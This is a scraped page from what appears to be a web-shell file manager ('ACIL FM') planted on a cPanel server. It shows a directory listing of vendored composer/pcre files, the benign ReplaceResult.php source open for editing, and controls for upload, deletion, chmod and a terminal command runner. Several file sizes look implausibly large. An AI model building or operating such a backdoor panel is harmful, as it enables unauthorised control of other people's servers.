ACIL FM
Dark
Refresh
Current DIR:
/opt/cpanel/ea-wappspector/vendor/rector/rector/vendor/composer/pcre/src
/
opt
cpanel
ea-wappspector
vendor
rector
rector
vendor
composer
pcre
src
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
PHPStan
-
chmod
Open
Rename
Delete
MatchAllResult.php
916 B
chmod
View
DL
Edit
Rename
Delete
MatchAllStrictGroupsResult.php
906 B
chmod
View
DL
Edit
Rename
Delete
MatchAllWithOffsetsResult.php
1.16 MB
chmod
View
DL
Edit
Rename
Delete
MatchResult.php
770 B
chmod
View
DL
Edit
Rename
Delete
MatchStrictGroupsResult.php
772 B
chmod
View
DL
Edit
Rename
Delete
MatchWithOffsetsResult.php
1006 B
chmod
View
DL
Edit
Rename
Delete
PcreException.php
1.51 MB
chmod
View
DL
Edit
Rename
Delete
Preg.php
17.33 MB
chmod
View
DL
Edit
Rename
Delete
Regex.php
7.2 MB
chmod
View
DL
Edit
Rename
Delete
ReplaceResult.php
757 B
chmod
View
DL
Edit
Rename
Delete
UnexpectedNullMatchException.php
535 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /opt/cpanel/ea-wappspector/vendor/rector/rector/vendor/composer/pcre/src/ReplaceResult.php
<?php /* * This file is part of composer/pcre. * * (c) Composer <https://github.com/composer> * * For the full copyright and license information, please view * the LICENSE file that was distributed with this source code. */ namespace RectorPrefix202411\Composer\Pcre; final class ReplaceResult { /** * @readonly * @var string */ public $result; /** * @readonly * @var 0|positive-int */ public $count; /** * @readonly * @var bool */ public $matched; /** * @param 0|positive-int $count */ public function __construct(int $count, string $result) { $this->count = $count; $this->matched = (bool) $count; $this->result = $result; } }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply